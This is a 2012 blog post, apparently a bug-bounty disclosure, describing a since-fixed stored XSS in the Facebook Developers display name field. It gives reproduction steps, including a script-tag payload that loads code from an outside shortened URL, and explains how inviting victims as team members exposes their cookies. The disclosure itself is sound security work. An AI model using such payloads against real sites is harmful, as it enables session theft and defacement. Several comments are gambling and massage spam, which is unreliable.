Saturday, October 13, 2012

Stored XSS on Facebook Developers

A month ago, I discovered a stored XSS vulnerability on the Facebook Developers website. Even though a developer's page can be only accessed by its application developers, an attacker could easily grant other users permission to view the page by inviting them to become team members. After the users become team members, the attacker would be able to exploit the vulnerability and steal the users' cookies to spoof their identities. The attacker would also be able to change the content displayed on the developer's page.

The vulnerability was in the display name field of the application. The following steps were taken to produce the XSS on my Firefox 15.0 browser:
  1. I created a malicious script, a file containing "alert(/XSSed/)", and hosted it on my server. The URL of the file became http://yujikosuga.com/xss.js
  2. I shortened the URL to http://goo.gl/p3skt because the maximum character length of the display name field is limited to 32 characters.
  3. I created a new Facebook application on the Developers website and set its display name to "<script src=//goo.gl/p3skt/><!--".
  4. I clicked on the Open Graph tab in the left menu, entered "xss" into the input fields and proceeded to the next page.
  5. I opened the Action Types section.
  6. An alert popup showing "/XSSed/" was displayed on my browser--the script was activated.
I then created a test user account and invited it to take on an admin role for the application. The test user account represented an unsuspecting victim. By clicking on just one button to accept the role, the test user gained permission to access the malicious page. I was able to confirm that the script was activated on that account as well.

This vulnerability was reported on August 30 and fixed on September 5 as part of Facebook's Security Bug Bounty Program.

7 comments:

  1. Did you got any cash?

    ReplyDelete
    Replies
    1. Yes, I did. This vulnerability was eligible for a reward as part of Facebook's Security Bug Bounty Program.

      Delete
  2. Nice finding Yuji....btw 1 ques does only cross domain xss were not getting filtered ?

    ReplyDelete
  3. Hi Yuji, currently are you still finding any XSS exploit in Facebook?

    ReplyDelete
  4. Correct Score Predictions - Still Casino
    The correct score predictions and correct score predictions are the best possible prediction sites. Learn bet365 from correct score predictions today and matchpoint increase your winnings!What are the best correct score prediction sites? 10cric

    ReplyDelete
  5. JAMOKA CASINO, LLC | Company Connections - KT Hub
    JAMOKA CASINO, LLC, 논산 출장샵 is an entertainment company based in Las Vegas, Nevada. 제이티엠허브출장안마 JAMOKA CASINO is 인천광역 출장마사지 registered and is 양산 출장안마 part of the Mandalay Bay Resort 이천 출장안마 & Casino

    ReplyDelete